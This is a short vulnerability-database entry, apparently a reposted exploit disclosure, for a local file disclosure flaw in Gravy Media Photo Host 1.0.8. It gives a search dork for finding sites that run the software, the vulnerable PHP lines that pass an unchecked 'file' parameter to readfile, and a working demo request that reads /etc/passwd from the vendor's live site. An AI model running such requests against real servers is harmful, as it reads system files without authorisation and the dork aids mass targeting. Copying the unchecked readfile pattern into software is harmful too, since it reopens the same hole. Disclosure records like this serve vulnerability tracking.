Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability

2009-06-22T00:00:00
ID SSV:14941
Type seebug
Reporter Root
Modified 2009-06-22T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er

====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];

70. readfile("$filename");
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

# sebug.net